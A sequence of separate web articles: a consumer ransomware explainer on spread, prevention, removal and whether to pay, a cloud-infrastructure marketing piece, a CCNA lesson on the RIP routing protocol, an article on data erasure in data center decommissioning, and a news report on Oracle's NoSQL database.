When the user purchases the right amount of Bitcoin and sends it to the specified address, the user is given a file or password.
- The user inputs the unlock key into some part of the ransomware program. Theoretically, the unlocker decrypts the user's files and deletes itself afterwards. However, this doesn't always happen: sometimes the criminal just takes the victim's money and does nothing.

Encryption is the same technology used to make online banking secure. It also secures your web browsing, instant messages, and emails (between major providers). However, hackers can also use encryption to lock victims out of their own data.

How does ransomware spread?

There are a few different ways of infecting users with ransomware. Below, I answered some of the most burning questions about the spread of this malicious software:

- Can ransomware spread through infected documents? Yes. Most types of ransomware arrive via infected downloads or email attachments. So-called document-based malware, where malicious Microsoft Office files house hidden malware, is becoming increasingly prevalent. All it takes is one click to "run macros" (and sometimes zero clicks, if the hacker uses a security bug) before your data is held for ransom.
- Can ransomware spread through Wi-Fi? Yes. Some ransomware spreads like a worm once it gets inside a network. In other words, it uses security vulnerabilities in software on the network to spread from computer to computer. Hackers often target vulnerabilities in file-sharing and remote desktop protocols.
- Can ransomware spread through USB? Yes. If you borrow an infected flash drive from a friend and use it on your computer, your computer can become infected.

Unfortunately, ransomware is extremely quick once it gets into your system. It only takes a few seconds to encrypt all your files. That's why you should focus on avoiding it in the first place.

What are the types of ransomware?
Ransomware has been one of the most popular and successful malware types in recent years. With it, cybercriminals can block access to your own data and devices, steal sensitive information, and earn a fortune by forcing you to pay a ransom. That's why ransomware is constantly evolving and comes in four types: locker, crypto, double extortion, and RaaS ransomware. The two main ones are locker and crypto-ransomware.

Locker ransomware: This type of ransomware completely blocks access to your device. It uses stolen credentials and social engineering techniques to get into the system. Even if you pay the ransom, the damage isn't necessarily undone, as the intruders already have your data.

Crypto-ransomware: With this type of ransomware, the hacker encrypts your sensitive information without compromising your computer's basic functionality. Once the hacker is in, you can see your files but not access them. At this point, you also receive a message informing you about the ransom and the possible loss of your files if you don't pay the required amount of money.

As we can see, ransomware is a quick and easy way for the bad guys to steal files and earn money. One of the best ways to stay protected is to use the best ransomware protection from our listed software.

How to prevent ransomware

Most types of ransomware require some kind of user error to trigger. On occasion, ransomware will use security vulnerabilities in software or remote access protocols to spread. Generally, preventing ransomware attacks is similar to preventing other kinds of attacks. Here are some more specific recommendations:

- Avoid opening downloads from untrusted sites.
- Be careful with emails: don't open attachments or links from untrustworthy or unknown senders.
- Keep your operating system and software up to date. Make sure that your web browser, antivirus, and other security-critical software gets frequent updates.
This can help to avoid ransomware that exploits security vulnerabilities.

- Use background scanning mode in your antivirus software so that every download is scanned for malware. Since ransomware encrypts your files within seconds of being installed, occasional manual scans won't catch it in time.

Other general security measures might keep ransomware at bay, but the user is the most important element of the security system. By being careful and skeptical of websites, emails, and other information on your computer, you can avoid ransomware.

How to remove ransomware

Since your files are completely encrypted, it's impossible to remove ransomware without totally wiping and reinstalling your computer. You won't be able to get back your files unless you have a backup from before the ransomware was installed. Here's how to wipe and restore your computer:

On a clean computer, make a bootable recovery drive specific to your operating system. (You won't need a second computer if you use a Mac.)

- On Windows, use Microsoft's USB/DVD Download Tool. This is a free and easy download straight from Microsoft.
- On macOS, boot from Recovery by holding down the Command and R keys after rebooting. The recovery drive is integrated into your operating system.
- Reboot your computer from the external or internal recovery drive. Follow the on-screen instructions to wipe your hard drive and reinstall the operating system.
- Reboot your computer when prompted and remove the recovery drive. On a Mac, don't hold down any keys.
- Set up your computer like new. After you finish setting it up, move your files from your backup onto your computer.
- Avoid doing the same thing that caused the ransomware to get installed in the first place. If you weren't following good security practices before, take the time to reevaluate your choices and be more careful next time.

If you don't have a backup of your files, you might be out of luck.
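Since a clean recovery depends entirely on the quality of your backup, it can be worth verifying that a restored copy actually matches the original files. One way to do that is by comparing checksums; the sketch below is a minimal illustration (the function names are made up for this example, not part of any particular backup tool):

```python
import hashlib
from pathlib import Path

def manifest(root):
    """Map each file under `root` (by relative path) to its SHA-256 digest."""
    root = Path(root)
    return {
        str(path.relative_to(root)): hashlib.sha256(path.read_bytes()).hexdigest()
        for path in sorted(root.rglob("*"))
        if path.is_file()
    }

def bad_restores(original_root, restored_root):
    """Return the relative paths that are missing or differ in the restored copy."""
    original = manifest(original_root)
    restored = manifest(restored_root)
    return {path for path in original if restored.get(path) != original[path]}
```

Running `bad_restores(backup_dir, restored_dir)` on two directory trees returns an empty set when every file survived the round trip intact.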
In the final section of this article, we briefly discuss why you shouldn't pay the ransom. There's no guarantee that the criminal won't simply take your money without restoring access to your files. On the other hand, if you're fine with losing your files, just wipe your computer completely and don't restore any backups.

In recent years, ransomware attacks have shown up in the news all the time. From the famous WannaCry attack that hit hundreds of major organizations to the Petya and NotPetya variants, ransomware has been a hot topic for several years. You can see a summary of the most significant ransomware variants here:

- WannaCry was the most well-known ransomware attack. By exploiting the EternalBlue security vulnerability in Microsoft Windows, it spread across the globe at an unprecedented speed. According to some estimates, the losses from this attack could top four billion dollars.
- SamSam attacked critical infrastructure using stolen Microsoft Remote Desktop credentials. Unlike many other kinds of ransomware, victims of SamSam did not necessarily commit any kind of error on their own.
- Locky arrived on victims' computers through a fake Microsoft Word invoice that contained malware. The document appeared to be invalid and tricked the user into enabling macros to "re-encode" the document. After enabling Word macros, the victim's computer would be locked with ransomware.
- Petya and NotPetya are variants of a similar ransomware program that overwrote critical boot sectors on its victims' computers. Compared to other types of ransomware, Petya uses a lower-level, more complete technique that renders victim systems completely inoperable.
- Ryuk attacked enterprise systems in late 2018, more recently than many of these other ransomware examples. It uses fileless techniques (including PowerShell scripting) to spread across corporate networks, quickly encrypting as many computers as it can.

Should I pay if I get hit by ransomware?

If at all possible, do not pay the ransom.
By paying the ransom, you're encouraging the ransomware authors to continue attacking other individuals and organizations. However, sometimes you can't avoid paying the ransom because you don't have backups and the value of your data exceeds the cost of the ransom.

Remember that the ransomware authors have no incentive to actually unlock your files once you pay the ransom. Although most of the time they do unlock victims' files, there is no guarantee. When a Kansas hospital was hit with a ransomware attack, its data was not returned, even after paying the ransom.

Another reason to avoid giving in is the possibility that other malware was installed at the same time. Malware often comes in groups: even if you pay to remove the ransomware, your computer might still be infected with other, more subtle malware.

If you prepared well and you have backups, wipe every infected computer and restore from your backups. This way, you'll still have your data and won't encourage cybercrime in the future.

Can ransomware infect an external hard drive?

Yes. Sometimes, ransomware can encrypt even external storage devices. To avoid this, don't keep your external hard drive permanently connected to your computer.

How common are ransomware attacks?

Unfortunately, they are pretty common. It is estimated that a few thousand ransomware attacks occur every single day.

Should you pay ransomware?

If possible, no. Paying the ransom only encourages hackers to infect more devices. Also, there are no guarantees that your data will be decrypted.

Can ransomware steal data?

Yes. Some types of ransomware can steal all your personal data before encrypting your files.
<urn:uuid:7f54a680-7986-427f-acb5-412ed1f1248b>
CC-MAIN-2024-38
https://cybernews.com/malware/what-is-ransomware/
2024-09-12T16:31:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00596.warc.gz
en
0.916212
2,363
3.296875
3
What Is Cloud Infrastructure?

How understanding the cloud can help transform your business.

Cloud computing is increasingly critical in driving business efficiency and innovation in today's digital age. From small businesses to large multinational corporations, businesses are shifting from traditional on-premises IT infrastructure to the cloud to harness its numerous benefits. But what does this buzzword we hear so often really mean? How does cloud infrastructure work? And more importantly, how can it transform your business?

This article from FullScope IT takes a deep dive into cloud infrastructure, exploring its workings, benefits, challenges, and more. We'll discuss various types of cloud computing, such as IaaS, PaaS, and SaaS, and look at different types of cloud architecture, including public, private, and hybrid clouds. Ultimately, understanding cloud infrastructure can empower you to leverage its full potential and transform your business to meet the modern challenges of the digital age.

What Is Cloud Infrastructure?

Cloud infrastructure refers to the blend of hardware and software components, like servers, storage, a network, and virtualization software, that support the delivery of cloud services. These can include data storage services, computing power, and networking features, among others. They are typically provided by Cloud Service Providers (CSPs) over the internet, replacing or supplementing the traditional on-premises IT infrastructure.

Cloud infrastructure offers a model where resources are retrieved from the internet through web-based tools and applications rather than a direct connection to a server. This allows businesses to avoid the capital expense and complexity of owning and maintaining their own IT infrastructure and instead simply pay for what they use when they use it.

What Are Cloud Service Providers (CSPs)?

Cloud Service Providers, or CSPs, play an instrumental role in the world of cloud computing.
These are the companies that deliver cloud services over the internet, allowing businesses to use computing resources without needing to own, operate, and maintain their own data centers. CSPs can range from tech giants like Google, with its Google Cloud platform, to specialized providers that cater to specific business needs. The key is to choose a cloud provider that aligns with your specific needs, whether that's flexibility, robust security, or advanced data services.

IaaS vs. PaaS vs. SaaS

When it comes to cloud services, there are three primary models: Infrastructure-as-a-Service (IaaS), Platform-as-a-Service (PaaS), and Software-as-a-Service (SaaS). These delivery models represent different levels of control, flexibility, and management in a cloud environment.

In the IaaS model, the cloud provider offers the infrastructure components traditionally present in an on-premises, physical data center. This includes servers, storage, and networking hardware, as well as the virtualization or hypervisor layer. Companies using IaaS have control over their infrastructure as if it were in their own data center but without the physical management and maintenance requirements. Examples of IaaS include Google Cloud, Amazon Web Services (AWS), and Microsoft Azure.

PaaS providers go a step further by providing all the resources required to build applications and services completely over the internet. In addition to the underlying storage, networking, and virtual servers, this also includes middleware, development tools, database management, business intelligence (BI) services, and more. PaaS is used by developers who want to create applications without worrying about the underlying infrastructure. Examples of PaaS include Google App Engine and Microsoft Azure.

SaaS is a service model where the cloud provider hosts and manages the software application and underlying infrastructure and handles any maintenance, like software upgrades and security patching.
Users connect to the application over the internet, usually with a web browser on their phone, tablet, or PC. Examples of SaaS include Google Workspace (formerly G Suite), Microsoft 365, and Salesforce.

Components of Cloud Infrastructure

Cloud infrastructure is typically divided into three primary components (compute, storage, and network resources), all working in tandem to offer a streamlined, scalable, and on-demand computing experience.

- Compute resources form the backbone of the cloud infrastructure. These are the virtual machines (VMs) or web servers that can be created, scaled, or terminated as needed. They handle processing and executing all tasks and applications, providing unparalleled flexibility.
- Storage resources cater to data needs in the cloud. They uphold a service model where data is managed, backed up remotely, and made accessible over a network, usually the internet. The design of cloud storage systems allows for easy scaling, offering users as much storage as they require at any time.
- Network resources encapsulate all networking capabilities, including firewalls, load balancers, and networking equipment. These elements forge a secure and reliable connection between the user and their cloud resources. Public and private area networks form a critical part of the cloud infrastructure, linking users and data centers.

In a cloud setting, these three components operate together. Compute resources or VMs run applications and workloads, offering the flexibility and scalability of virtualization. Storage resources offer accessible data storage depending on application needs. Network resources, a mix of physical hardware and software, ensure secure and efficient data communication. When using a cloud service, your applications run on compute resources, engage storage resources for data transactions, and network resources for communication.
The elegance of cloud infrastructure lies in its transparency: applications appear to run on a local machine, while in reality, their operating systems are located on a server potentially thousands of miles away.

How Does Cloud Infrastructure Work?

At a basic level, cloud infrastructure operates on the principle of shared resources. Physical cloud resources, like servers and storage, are virtualized and partitioned into multiple "virtual" resources that can be allocated as needed. This flexible, scalable approach is managed and orchestrated by software, meaning users can access and use these resources on demand over the internet.

There are primarily three models of cloud infrastructure deployment: public cloud, private cloud, and hybrid cloud. Each model has its own specific use cases, benefits, and potential challenges, and they are designed to cater to different organizational needs. Understanding these models is critical for businesses looking to tap into the power of the cloud environment.

Public Cloud

A public cloud is a type of cloud environment where cloud resources such as servers and storage are owned, operated, and managed by third-party cloud service providers. Users access these services and manage their accounts via the internet. Prominent public cloud providers include AWS, Microsoft Azure, and Google Cloud, offering services like computing power, storage, and data analytics. These services enable users to benefit from scalability and flexibility while circumventing the costs and intricacy of owning and managing on-premises IT infrastructures.

The public cloud is available to the general public and dynamically shares resources (such as CPU cycles, storage, or bandwidth) among users on demand. This resource-sharing model allows multiple users to utilize the same physical resources, enabling public cloud providers to offer highly scalable resources at reduced costs.
While public clouds can be an ideal choice for organizations aiming to efficiently scale their IT infrastructure, it's also crucial to be cognizant of threats targeting the shared security model and to ensure adequate protection measures for sensitive data.

Private Cloud

A private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources in an on-premises model, but a third-party service provider can also host it. The key element of a private cloud architecture is that services and infrastructure are maintained on a private network, offering greater control and security.

Government agencies, financial institutions, and other medium-to-large organizations with heavy security regulations or control requirements often use private clouds. The infrastructure and services in a private cloud are always accessible and can be scaled on demand, providing companies with flexibility and agility.

Unlike public clouds, private clouds typically require the company to purchase and maintain all the software and infrastructure, leading to higher costs. However, these costs may be offset by increased security and the ability to customize the cloud environment to the business's specific needs.

Private clouds offer many of the benefits of cloud infrastructure while giving businesses greater control and customization options, but without the scalability benefits of public clouds. However, there is a model that combines the features of both public and private clouds: the hybrid cloud.

Hybrid Cloud

Hybrid cloud is a cloud computing environment that blends public clouds, private clouds, and on-premises infrastructures. A hybrid cloud architecture allows data and apps to move between the two environments, giving businesses greater flexibility, more deployment options, and the ability to optimize existing infrastructure, security, and compliance.
In a hybrid cloud model, certain resources are kept in the private cloud or on-premises, while other data and applications are stored in the public cloud. The key to a successful hybrid cloud is a seamless integration that allows for the smooth movement of data and applications between cloud resources.

Hybrid clouds offer businesses the best of both worlds. They can maintain control of an internally managed private cloud while enjoying the benefits of public cloud computing, such as cost-effectiveness and scalability. The hybrid model is particularly attractive to businesses with dynamic or highly changeable workloads, as well as businesses that deal with big data processing, where the data can be processed in the public cloud but the results are returned to the private cloud for localized analysis.

Hybrid clouds can be complex, however: they require managing multiple vendors and security protocols, so it's essential to have robust management tools in place. The cloud provider should have secure APIs and other tools for managing, orchestrating, and integrating all the different environments.

Benefits of Cloud Computing

Understanding the advantages of cloud computing is key to harnessing its power for your business. Some of the primary benefits include:

- Cost-efficiency: Cloud services often operate on a pay-as-you-go model, meaning businesses only pay for what they use, resulting in significant cost savings. The expense of purchasing and maintaining an on-site physical infrastructure is replaced with a flexible subscription model that can scale with your business needs. Moreover, the economies of scale offered by cloud providers can further drive down costs.
- Scalability and Flexibility: One of the most considerable benefits of cloud computing is its scalability. Cloud infrastructure allows businesses to quickly and easily upscale or downscale their IT requirements as and when required.
This level of agility can give businesses using cloud computing a real advantage over competitors.
- Accessibility and Collaboration: With cloud services, businesses can offer employees flexible working conditions and the tools they need to work from anywhere, on any device, improving work-life balance and increasing productivity. Cloud computing also makes collaboration a breeze, allowing multiple users to meet virtually and easily share information in real time and via shared storage.
- Disaster Recovery and Business Continuity: In the face of unexpected events like natural disasters, power failures, or even human errors, cloud services can provide peace of mind with robust disaster recovery and business continuity plans. Data in the cloud is typically backed up across multiple servers, ensuring its availability and reducing the risk of data loss.

Challenges of Cloud Computing

While cloud computing offers numerous advantages, it also presents its own set of challenges that businesses must navigate to ensure a successful cloud adoption journey. These include:

- Security Concerns: One of the major concerns businesses have about adopting cloud services is security. While most cloud providers offer robust security measures, including firewalls, encryption, and identity management tools, the responsibility for security is shared. Businesses must ensure their own cloud security practices, such as user access controls and security protocols, are robust and adhere to best practices.
- Migration Complexities: Transitioning from a traditional on-premises infrastructure to a cloud environment can be complex and may cause disruption if not handled correctly. Cloud deployment requires careful planning and execution, including the selection of the right cloud provider, choosing the right cloud architecture (public, private, or hybrid cloud), and managing the migration of data and applications to virtual resources.
- Management and Governance: Cloud infrastructure management requires new skills and tools. Governance policies must be put in place to manage costs, observability, performance, security, and service quality.
- Vendor Lock-In: There's always a risk of becoming too dependent on a single cloud provider. Switching providers can be costly and time-consuming, so it's important to understand the terms and conditions from the outset and consider the use of multi-cloud strategies if necessary.

Despite these challenges, the benefits of cloud computing typically outweigh the potential drawbacks for most businesses. Furthermore, many of these challenges can be mitigated with careful planning, sound strategy, and the help of knowledgeable managed service providers, like FullScope IT.

How FullScope IT Can Help Transform Your Business with Cloud Services

Grasping the nuances of cloud infrastructure is a significant stride forward, but managing its intricacies while simultaneously running your business can be challenging. FullScope IT, equipped with vast experience in cloud services and IT solutions, offers a comprehensive approach that empowers businesses to relish the full benefits of cloud computing without the associated complications.

Our team of experts at FullScope IT adopts a proactive approach to cloud services, offering round-the-clock supervision and quickly detecting and rectifying issues to ensure minimal service disruption. Our primary objective is to augment business continuity, thus permitting you to concentrate on what matters most: propelling your business forward.

By choosing FullScope IT as your cloud services partner, you'll benefit from:

- Customized cloud solutions tailored to align with your business objectives.
- Proactive protection against ever-evolving cybersecurity threats.
- Scalable services that adapt seamlessly to your business growth.
- Significant cost savings achieved through efficient resource management and reduced downtime.
By entrusting your cloud computing needs to FullScope IT, you're choosing peace of mind, knowing your cloud infrastructure is in competent hands. Allow FullScope IT to guide you through the process, simplifying the complexities and managing the challenges to ensure a robust, secure, and efficient cloud platform for your business.

Ready to harness the power of the cloud to transform your business? Contact us today to discover more about our services and how we can assist you.
<urn:uuid:26d287b3-904e-4e14-a195-a5e9a29b0884>
CC-MAIN-2024-38
https://fullscopeit.com/2022/07/a-different-way-to-think-of-the-cloud/
2024-09-12T15:41:52Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651460.54/warc/CC-MAIN-20240912142729-20240912172729-00596.warc.gz
en
0.931926
2,972
2.984375
3
In this lesson we will introduce you further to Dynamic Routing, as it is a core requirement in your preparation for Cisco's CCNA exam. Routing Information Protocol (RIP) is the first dynamic routing protocol ever invented, and it's important to understand how it works while studying for your CCNA certification.

Routing Information Protocol (RIP) was the first protocol used in dynamic routing. Although modern networks do not use it today, it's still popular in small networks because of its simplicity and in academic environments as a starting point for understanding how the routing process works. That is why Cisco includes it on the CCNA exam.

RIP is a distance vector routing protocol. All routing protocols use a metric, and the one used by RIP is the hop count. The shorter the hop count, the more likely RIP will choose that path to reach the destination network. However, RIP's maximum hop count is 15 (a CCNA exam question). Any route with a hop count greater than 15 is considered unreachable.

Routing updates are broadcast by default every 30 seconds. They are sent in UDP packets with both source and destination port numbers set to 520. Because the maximum datagram size is only 504 bytes, a maximum of 25 routes can be announced in a single packet. Having more routes will cause the router to send more packets.

There are only two message types used by RIP: the Request message and the Response message. The names are as descriptive as they can be. When a RIP-enabled router interface comes up, it sends out a Request message. The other RIP-enabled routers in the network respond with Response messages. When the first router receives the Response messages, it installs the newly received routes in its routing table. If the router already has a route in its table but receives one with a better hop count, the old route is replaced. After that, the router sends its own routing table to its neighbors.
The default Administrative Distance for RIP is 120 (another CCNA exam question). In routing, the AD is used as a measure of trustworthiness. The lower the value, the higher the priority of that route. For example, if you have a route received through RIP, which has an AD of 120, and the same route received from a higher-priority protocol like OSPF, which has a default AD of 110, OSPF will be the one to route the packets through its route, even if the routing protocol metric is greater. Due to its lack of scaling capabilities, RIP is the least-preferred protocol of all Interior Gateway Protocols (IGPs).

There are three versions of RIP: RIPv1, RIPv2, and RIPng. Only the first two are required for the CCNA certification.

RIPv1 is the first version of this protocol. Its main disadvantage is that it is a Classful Routing Protocol, meaning that you cannot use Variable Length Subnet Masking (VLSM). The configuration of the RIPv1 protocol is straightforward. You must enable RIP routing with the router rip global configuration command, then specify the networks you want to announce with the network network-address command. RIPv1 assumes the default subnet mask for the IP address you specify. The default masks are: class A – 255.0.0.0, class B – 255.255.0.0, class C – 255.255.255.0. Please note that if you enter a non-classful address like 192.168.1.32, the router IOS will automatically convert it to the classful network address, 192.168.1.0.

To check that RIP is receiving updates from other routers, use the show ip route command. RIP routes can be easily identified as they are prefixed with R. Also, show ip protocols can give you plenty of information if you want to check whether you are correctly advertising your routes to others.

Router#show ip route
Codes: C – connected, S – static, I – IGRP, R – RIP, M – mobile, B – BGP
Gateway of last resort is not set
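The interplay between Administrative Distance and metric described above can be illustrated with a short sketch. This is not Cisco IOS code; the route records and values below are hypothetical, chosen to mirror the RIP-versus-OSPF example: the lowest AD wins first, the metric only breaks ties, and RIP routes at 16 hops or more are unreachable.

```python
# Illustrative sketch (not Cisco IOS): picking between candidate routes
# using administrative distance first, then the protocol metric.

RIP_AD = 120
OSPF_AD = 110
RIP_INFINITY = 16  # a hop count of 16 means "unreachable" in RIP

def best_route(candidates):
    """Return the preferred route: lowest AD wins; metric breaks ties.

    Each candidate is a dict with 'protocol', 'ad', and 'metric' keys.
    RIP routes whose hop count reaches 16 are discarded as unreachable.
    """
    usable = [r for r in candidates
              if not (r["protocol"] == "RIP" and r["metric"] >= RIP_INFINITY)]
    if not usable:
        return None
    return min(usable, key=lambda r: (r["ad"], r["metric"]))

routes = [
    {"protocol": "RIP",  "ad": RIP_AD,  "metric": 2},   # 2 hops
    {"protocol": "OSPF", "ad": OSPF_AD, "metric": 50},  # OSPF cost 50
]
print(best_route(routes)["protocol"])  # OSPF wins: AD 110 beats AD 120
```

Note that OSPF wins here despite its much larger metric value: metrics from different protocols are never compared directly, which is exactly why AD exists.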
<urn:uuid:848247be-826e-4141-ae28-fb1eceb7b891>
CC-MAIN-2024-38
https://www.certificationkits.com/ccna-concept-routing-information-protocol-rip/
2024-09-13T22:03:22Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651540.48/warc/CC-MAIN-20240913201909-20240913231909-00496.warc.gz
en
0.901728
867
3.859375
4
Summary: This article explores the process of data center decommissioning and cites the importance of software-based data erasure during this process. It lists the various ways in which overwriting data can help an organization ensure data security and prevent data breaches during data center decommissioning.

A data center is a facility where organizational computing systems, servers, and associated components, such as network and storage devices, are located. Data center decommissioning is the practice of dismantling computing systems and hardware for disposal, recycling, relocation, or reuse as the data is transferred to the upgraded servers. Decommissioning a data center is as difficult as installing one, and given the sensitive nature of organizational data, the decommissioning process requires thorough planning and careful execution.

While retiring IT assets in a data center, follow the quick decommissioning checklist below:

Data Center Decommissioning Checklist:

- Prepare Scope of Work
  - Document a list of devices to be dismantled: computers, servers, hard drives, cables, and other data center equipment.
  - Identify and asset-tag devices that need to be recycled or re-used.
- Take Backups and Ensure Software Licenses for Servers Are in Place
  - Ensure all necessary data and power backup systems are in place.
  - Locate and keep all software licenses for servers handy.
- Planning for Decommissioning
  - Create an implementation plan defining the roles of the person responsible for the decommissioning process and the activities to be performed at different time intervals.
  - List the vendors you may need to support the process of dismantling.
  - Cancel all maintenance contracts for servers, if any.
  - Arrange necessary tools for decommissioning, including forklifts, tip guards, hoists, data erasure tools, degaussers, etc.
- Dismantling and Data Sanitization
  - Dismantle the servers.
  - Choose the right destruction method – erase, degauss, or shred – depending upon the reuse requirement.
  - For data sanitization, connect the storage media and permanently wipe redundant data with professional data erasure tools.

Role of Data Erasure in Data Center Decommissioning

Retiring a data center is not just about dismantling and removing the IT hardware. It is also about maintaining data security at all levels. The absence of data protection during the removal of redundant hardware may let hackers gain access to data at rest and misuse sensitive information, causing data breaches. It is thus imperative to completely sanitize and destroy data during the decommissioning process. The Morgan Stanley data breach is a classic example of how ignoring due diligence in data center decommissioning can lead to a data breach and subsequent penalties worth millions of dollars.

Also, outdated systems and equipment do not come with the latest features and security updates. Thus, IT assets at end-of-life possessing sensitive data can be breached if proper care is not taken to dispose of them. This may ultimately lead to data breach lawsuits and the loss of the company's reputation.

Secure data erasure during data center decommissioning can be helpful in more than one way.

- Facilitates On-site Data Destruction: During the decommissioning process, data erasure helps in wiping unwanted data from drives and servers at the company's own facility, either through a vendor or by the company itself. The advantage of on-site data destruction is that data and devices exchange very few hands and the process can be witnessed at the company's facility. When you plan to opt for secure data erasure, ensure your data erasure tool or your service provider complies with prominent standards like NIST 800-88 (National Institute of Standards and Technology) and DoD 5220.22-M (U.S. Department of Defense).
- Ensures Efficiency & Security: Ensuring data security throughout the data lifecycle is critical, and software-based data erasure ensures secure and permanent wiping of all your sensitive data beyond retrieval, even in a laboratory setting. You can achieve media sanitization across all your data center IT assets with data erasure, whether it is your redundant hard drives, solid-state drives, servers, virtual machines, or logical storage area networks. Software-based data erasure produces a 100% tamper-proof report for every erasure performed to confirm that wiping was successfully done.
- Helps in Meeting Compliance: Organizations are obligated by laws like EU-GDPR, CCPA, SOX, HIPAA, etc. to include data destruction as a part of their IT asset management policy. Modern data protection laws demand secure data destruction that leaves no traces behind. The use of a certified and professional data erasure tool like BitRaser is recommended as it helps in ensuring compliance with global data protection legislation by destroying information securely and generating auditable reports. In case a third-party vendor is involved in decommissioning, organizations should demand the use of certified and reliable data sanitization tools.
- Offers Documented Evidence of Wiping (Audit Trails): Software-based erasure produces a certificate of destruction for every instance of wiping. It acts as an audit trail for the complete data erasure process. The certificate helps an organization prove that it has securely destroyed the data. It also promotes trust in the third-party vendor performing media sanitization during data center decommissioning on behalf of your organization. When data is securely wiped, it eliminates all possibilities of data getting compromised or breached.
- Encourages Responsible Recycling: Data erasure or overwriting is an eco-friendly approach to media sanitization as it ensures that the storage device is available to be reused, repurposed, or recycled.
A professional wiping tool is thus a sustainable approach to decommissioning IT assets in a data center, as it reduces e-waste. Unlike physical destruction for device disposal, data sanitization is an eco-friendly approach that erases every trace of information from the device and allows its further reuse and recycling.

Data Erasure: An Integral Part of Data Center Decommissioning Services

Data erasure forms an integral part of data center decommissioning services as it deals with the most important element of a data center, i.e., its sensitive data. The absence of the right data destruction policy, or any negligence in ensuring due diligence in the disposal of sensitive information, may lead to data leakage and breach. This can not only cost the organization huge penalties and loss of reputation but also hamper business-critical work and erode customer trust. It is thus pivotal for every organization to ensure that it either deploys a professional and certified data erasure tool or hires a third-party vendor that uses certified software and generates a certificate for every wipe executed.
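As a rough illustration of what software-based overwriting does at its core, the sketch below zero-fills a single file in place. This is a teaching toy under stated assumptions, not a certified sanitization tool: real NIST 800-88 compliant erasure must address the whole device, including remapped sectors and SSD over-provisioned areas, which file-level code cannot reach.

```python
# Teaching sketch only: overwrite one file's contents with zeros.
# Certified erasure tools work at the device level; this does not.
import os

def overwrite_file(path, passes=1):
    """Overwrite a file's bytes with zeros, flushing to disk each pass."""
    size = os.path.getsize(path)
    with open(path, "r+b") as f:
        for _ in range(passes):
            f.seek(0)
            f.write(b"\x00" * size)
            f.flush()
            os.fsync(f.fileno())  # push the overwrite past OS caches

# Demo: create a throwaway file, wipe it, and confirm the bytes are gone.
with open("demo.bin", "wb") as f:
    f.write(b"sensitive data")
overwrite_file("demo.bin")
with open("demo.bin", "rb") as f:
    assert f.read() == b"\x00" * len(b"sensitive data")
os.remove("demo.bin")
```

The verification read at the end mirrors, in miniature, why professional tools issue an erasure report: overwriting without confirming leaves you with no evidence that the wipe succeeded.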
<urn:uuid:6b59917e-d7f6-47ff-ae59-3918ec53b483>
CC-MAIN-2024-38
https://www.bitraser.com/article/secure-data-erasure-for-data-center-decommissioning.php
2024-09-15T03:52:43Z
s3://commoncrawl/crawl-data/CC-MAIN-2024-38/segments/1725700651614.9/warc/CC-MAIN-20240915020916-20240915050916-00396.warc.gz
en
0.91488
1,394
2.84375
3
The Oracle NoSQL Database can now be downloaded from the Oracle Technology Network. The software will also be a key component of the Oracle Big Data Appliance, due to be shipped in the first three months of 2012.

Based on the Berkeley DB database, it would be of interest to "customers who are acquiring massive amounts of data who are unsure about the schema, who want more fluid capture of the data," said Marie-Anne Neimat, vice-president of database development at Oracle.

The company is responding to the growing number of databases introduced in the past few years that eschew the typical SQL architecture in order to scale up and speed performance. Such a database may be useful for storing information such as data from service logs, sensors, and meters, as well as from social networks and personal information for e-commerce sites, the company claimed.

A database of this sort would also be a good fit for large organizations that are already using Oracle databases, noted analyst Curt Monash of Monash Research. In many cases a relational database is not the best choice for tasks such as tracking Web interactions. "NoSQL in general deserves a place in Oracle shops, so it makes sense for Oracle [Nasdaq: ORCL] to try to co-opt it," he wrote in a blog posting.

The database is based on the Java version of Berkeley DB, an open source database developed at the University of California, Berkeley, that is widely used in embedded systems. The database uses a simple key-value data model, meaning that a program can fetch the needed piece of data by providing the appropriate key, or numeric identifier.

Although it does not offer the ability to do nuanced, highly structured queries in the same way a SQL relational database would, the database doesn't require a fixed underlying schema, so organizations can add new columns as new types of information need to be captured, Neimat said.
The software allows administrators to trade the speed of responsiveness against the time needed to reach consistency, or the state when a piece of data is completely stored. "When an update is issued, it can be applied to a single node or the majority of nodes, or to all of them. That makes it easy for the user to manage consistency," Neimat said.

The database will be able to scale at a near-linear rate, meaning capacity can be increased at a uniform rate as more servers are added to the cluster. Oracle itself has built a 300-node cluster with this database, though, theoretically, there is no limit to the size of the cluster that could be built, Neimat said.

Keeping track of the location of all the data falls to a client library, which can be linked to by an application. The Java-based library routes requests to the node holding a copy of the data. Programmers have their applications interact with the database through a Java API (application programming interface).

Primary keys themselves can have sub-keys, which point to different fields within the same record. Subkeys can be advantageous in that they can be used to add more data fields to existing records. "You can have flexibility in which attributes to have with which records. You're not sure what you want to do with the data, but you do know you want to keep it and analyze it later," Neimat said.

"All the records that share the same root key are all on the same partition, all on the same node," Neimat said. "You can update multiple records, insert, retrieve, delete multiple records using the primary key."

Administrators can interact with the database through a Web console, which offers the ability to manage and monitor topology, as well as to set up load balancing across multiple nodes.

The company will offer a free community version of the database, as well as a commercial version that will eventually be augmented with additional features.
The company is promising that the installation will be polished to the degree that one would expect from Oracle, and that the company will offer full support for the paid editions.
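The root-key behavior Neimat describes can be sketched with a toy store. This is not the Oracle NoSQL API; the class, hashing scheme, and record values below are hypothetical, showing only why every record sharing a major key, whatever its minor keys, lands on the same partition: the partition is chosen by hashing the major key alone.

```python
# Toy illustration (not the Oracle NoSQL API): a key-value store whose
# records are addressed by (major key, minor key), where the major key
# alone selects the partition that stores the record.
import hashlib

NUM_PARTITIONS = 4

def partition_for(major_key):
    """Map a major key to a partition index with a stable hash."""
    digest = hashlib.sha256(major_key.encode()).digest()
    return int.from_bytes(digest[:4], "big") % NUM_PARTITIONS

class ToyKVStore:
    def __init__(self):
        self.partitions = [dict() for _ in range(NUM_PARTITIONS)]

    def put(self, major_key, minor_key, value):
        part = self.partitions[partition_for(major_key)]
        part[(major_key, minor_key)] = value

    def get(self, major_key, minor_key):
        part = self.partitions[partition_for(major_key)]
        return part.get((major_key, minor_key))

store = ToyKVStore()
store.put("user42", "email", "a@example.com")
store.put("user42", "last_login", "2011-10-03")  # same partition as above
print(store.get("user42", "email"))  # prints a@example.com
```

Because both records hash through the same major key, a multi-record update under "user42" never has to touch more than one node, which is what makes the single-key operations Neimat mentions cheap.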
